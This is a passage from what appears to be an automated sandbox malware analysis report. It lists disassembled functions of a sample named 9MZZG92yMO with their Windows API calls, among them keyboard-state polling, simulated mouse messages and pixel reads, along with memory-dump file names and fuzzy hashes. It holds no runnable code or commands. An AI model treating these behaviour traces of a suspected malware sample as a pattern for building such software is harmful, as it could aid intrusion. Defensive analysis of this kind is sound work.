                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327935632-0
                                                                                                                      • Opcode ID: 0b49028d4c656d27fababc377116ad516edc87417ddb64d4b1b9c314e555fa26
                                                                                                                      • Instruction ID: ca7fa588d25ae7b85b6817746e0a20265bea3daf6b4162f5b0c863b0675a96bf
                                                                                                                      • Opcode Fuzzy Hash: 0b49028d4c656d27fababc377116ad516edc87417ddb64d4b1b9c314e555fa26
                                                                                                                      • Instruction Fuzzy Hash: EC511879A00205DFCB40EFA9D484EADBBB5FF19324F04806AE855AB312D735AD45CF60
                                                                                                                      Function 0052E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0052E61F
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0052E648
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0052E687
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0052E6AC
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0052E6B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1389676194-0
                                                                                                                      • Opcode ID: c2aef35bbfc4c4f5976fb72021e01736b179cad06c75ef660c09d89514e2d44d
                                                                                                                      • Instruction ID: 0c77916664fa1182dae4dda4c2c51f86c939e1f37ac062d1262c12abd1866ac7
                                                                                                                      • Opcode Fuzzy Hash: c2aef35bbfc4c4f5976fb72021e01736b179cad06c75ef660c09d89514e2d44d
                                                                                                                      • Instruction Fuzzy Hash: 77512839A00105EFCB40EF65D985EADBBF5FF09318B1480A9E809AB361CB35ED50DB64
                                                                                                                      Function 0054A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3a5b60d9aa9eddc799fb7d352066fad0d87dbe2c4790b9f6b5cc6683e4c3c9d4
                                                                                                                      • Instruction ID: ffe53773d988341d87e48717e0fde54180f906f7c74634712d9a650b3026ee45
                                                                                                                      • Opcode Fuzzy Hash: 3a5b60d9aa9eddc799fb7d352066fad0d87dbe2c4790b9f6b5cc6683e4c3c9d4
                                                                                                                      • Instruction Fuzzy Hash: 37412439984104AFD760DF28CC48FEABFA8FB09318F140565F81AA72E1C730AD44EB51
                                                                                                                      Function 004C2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004C2357
                                                                                                                      • ScreenToClient.USER32(005857B0,?), ref: 004C2374
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 004C2399
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 004C23A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210589936-0
                                                                                                                      • Opcode ID: 9882b38bbddb647dc3da7f7c7e16038418552cc16ee71337d9fb72b3e8597e32
                                                                                                                      • Instruction ID: 9504c73f6274b7de0d472a140a327be7b74bfdac62fdbc5a4e7f7c74ef505c71
                                                                                                                      • Opcode Fuzzy Hash: 9882b38bbddb647dc3da7f7c7e16038418552cc16ee71337d9fb72b3e8597e32
                                                                                                                      • Instruction Fuzzy Hash: C9419239604109FFCF159F68C944FEABB74FB05364F20431AF825922A0CB789955DB95
                                                                                                                      Function 005163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005163E7
                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00516433
                                                                                                                      • TranslateMessage.USER32(?), ref: 0051645C
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00516466
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00516475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2108273632-0
                                                                                                                      • Opcode ID: f5279f1b11822e40c36e59a6957cdb0f5d2f29669cdd86ef3e07669dbb12734f
                                                                                                                      • Instruction ID: 5fc804e554f77946786e2613e8b7a327b40568d49d0c6de8a6b30f250623710b
                                                                                                                      • Opcode Fuzzy Hash: f5279f1b11822e40c36e59a6957cdb0f5d2f29669cdd86ef3e07669dbb12734f
                                                                                                                      • Instruction Fuzzy Hash: 0C31C431900656AFEF24CFB4DC84BF67FA8BB11344F144565E821D31A1EBA598C9EB60
                                                                                                                      Function 00518A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00518A30
                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00518ADA
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00518AE2
                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00518AF0
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00518AF8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3382505437-0
                                                                                                                      • Opcode ID: c91b7567af423284b6d5d9cf1afb2f149641f0e73a330f475fb4ff830883d091
                                                                                                                      • Instruction ID: c3a747edc61cb42acde197650c5829016e55e1a1c0a8b7afaf379be7faa13402
                                                                                                                      • Opcode Fuzzy Hash: c91b7567af423284b6d5d9cf1afb2f149641f0e73a330f475fb4ff830883d091
                                                                                                                      • Instruction Fuzzy Hash: 9D31B171500219EBEB24CF68D94CAEE3FB5FF15325F108629F925EA1D0C7B09954DB90
                                                                                                                      Function 0051B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 0051B204
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0051B221
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0051B259
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0051B27F
                                                                                                                      • _wcsstr.LIBCMT ref: 0051B289
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902887630-0
                                                                                                                      • Opcode ID: 1ad04df88474dc95707f3136ac0aee8868bfc1e22a408405bd145a2c56e0c66a
                                                                                                                      • Instruction ID: 26d5a630f6ba4d1e3ef28c25d963c62209d38a33f7419363aee667ab2dd2a2ed
                                                                                                                      • Opcode Fuzzy Hash: 1ad04df88474dc95707f3136ac0aee8868bfc1e22a408405bd145a2c56e0c66a
                                                                                                                      • Instruction Fuzzy Hash: 3C21F5752042407AFB255B7A9C49EBF7F98EF4A750F00413EF814DA1A1EBB5DC849760
                                                                                                                      Function 0054B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054B192
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0054B1B7
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0054B1CF
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0054B1F8
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00530E90,00000000), ref: 0054B216
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2294984445-0
                                                                                                                      • Opcode ID: 6f4e5f2734954addb59666a744d7f5932398d5ffa6545b915910fd3051fae010
                                                                                                                      • Instruction ID: cab85cb6cc015cca48763019ecf9ee4dfe7e7df416d6e7d74335113ee0a7d620
                                                                                                                      • Opcode Fuzzy Hash: 6f4e5f2734954addb59666a744d7f5932398d5ffa6545b915910fd3051fae010
                                                                                                                      • Instruction Fuzzy Hash: BE218075A14651AFDB109F389C04AAA3FA4FB16369F115B29BD22D71E0E730D820DB90
                                                                                                                      Function 00519307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00519320
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00519352
                                                                                                                      • __itow.LIBCMT ref: 0051936A
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00519392
                                                                                                                      • __itow.LIBCMT ref: 005193A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2983881199-0
                                                                                                                      • Opcode ID: 93ce10f03d179644915a7cee6b2129dabd92e8207c32ab331fc5c0a03bffca8f
                                                                                                                      • Instruction ID: 43203a6290f5f55464558937e12d80fc104274930299690ea5072a78246fa534
                                                                                                                      • Opcode Fuzzy Hash: 93ce10f03d179644915a7cee6b2129dabd92e8207c32ab331fc5c0a03bffca8f
                                                                                                                      • Instruction Fuzzy Hash: 76213734700208BBEB10AE659C99EEE3FA8FB99724F04442AF914D71C0D6B08D849791
                                                                                                                      Function 00535A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 00535A6E
                                                                                                                      • GetForegroundWindow.USER32 ref: 00535A85
                                                                                                                      • GetDC.USER32(00000000), ref: 00535AC1
                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00535ACD
                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00535B08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: 1561ae9880b92d1840e1909b5dc582f8480a1d4c2b81ef9e878460c958db3471
                                                                                                                      • Instruction ID: 208d3582050cd1513213a8d1082bf69212ead5eddc88f18ca2f19c56377e38ce
                                                                                                                      • Opcode Fuzzy Hash: 1561ae9880b92d1840e1909b5dc582f8480a1d4c2b81ef9e878460c958db3471
                                                                                                                      • Instruction Fuzzy Hash: 2E21C339A00104AFD704EFA9DC88AAABBE5FF59314F15847DF809D7362DA34AC04DB90
                                                                                                                      Function 004C12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004C134D
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004C135C
                                                                                                                      • BeginPath.GDI32(?), ref: 004C1373
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004C139C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: ae1ce23db35e2cdf9fa4069ba1b5f6c73272d2a66bfa6322c5e1c456714f06e1
                                                                                                                      • Instruction ID: 85a7e87bd57e7c7c8bf545ad9cfe52a0de26061525d24357b7f3012a7ec1f5ff
                                                                                                                      • Opcode Fuzzy Hash: ae1ce23db35e2cdf9fa4069ba1b5f6c73272d2a66bfa6322c5e1c456714f06e1
                                                                                                                      • Instruction Fuzzy Hash: 96218838800648DFEB108F65DC08B6A7BF4F722319F24422BFC15A61B1E7749859EF95
                                                                                                                      Function 0051BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 8a5f3308d2138c2a6ad6283a111fbb445f85db8bedc6fabed0f5fa7fdbb2692c
                                                                                                                      • Instruction ID: 59172f79fc87d255c4dd7569a7bdb5d7ac4f7a239d8623cec529f35fe70c7130
                                                                                                                      • Opcode Fuzzy Hash: 8a5f3308d2138c2a6ad6283a111fbb445f85db8bedc6fabed0f5fa7fdbb2692c
                                                                                                                      • Instruction Fuzzy Hash: C201C07224010A7AF6046B136D42FFBBB5CFF6138DF044426FD0596382EB24EE5482E5
                                                                                                                      Function 00524A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00524ABA
                                                                                                                      • __beginthreadex.LIBCMT ref: 00524AD8
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00524AED
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00524B03
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00524B0A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3824534824-0
                                                                                                                      • Opcode ID: 9b8e843345c32a275b46929b5266883a0bd77ceecdc0053f2d747a7a9bbe7be5
                                                                                                                      • Instruction ID: dbb27c38af17861f8173d18810ad415075795c4bdc6f55a9e49a5dd874bea76b
                                                                                                                      • Opcode Fuzzy Hash: 9b8e843345c32a275b46929b5266883a0bd77ceecdc0053f2d747a7a9bbe7be5
                                                                                                                      • Instruction Fuzzy Hash: 9F11087A904254BBDB018FACEC08ADB7FACEF56325F144269F815E3290D771C9089BA1
                                                                                                                      Function 00518202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0051821E
                                                                                                                      • GetLastError.KERNEL32(?,00517CE2,?,?,?), ref: 00518228
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00517CE2,?,?,?), ref: 00518237
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00517CE2,?,?,?), ref: 0051823E
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00518255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842720411-0
                                                                                                                      • Opcode ID: 7e91e34ec2fe7f7121f37743a0d62732180b144522e95463bce040370fac3fa9
                                                                                                                      • Instruction ID: 0db960da4e3cf63771d33449934d60a82ea28ee68c1511e86dd261150ad07976
                                                                                                                      • Opcode Fuzzy Hash: 7e91e34ec2fe7f7121f37743a0d62732180b144522e95463bce040370fac3fa9
                                                                                                                      • Instruction Fuzzy Hash: BB014B79200204AFEB214FA9DC48DAB7FADFF9A758B500429FD19C2220DA318C44EB60
                                                                                                                      Function 0051710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?,?,00517455), ref: 00517127
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517142
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517150
                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?), ref: 00517160
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 0051716C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
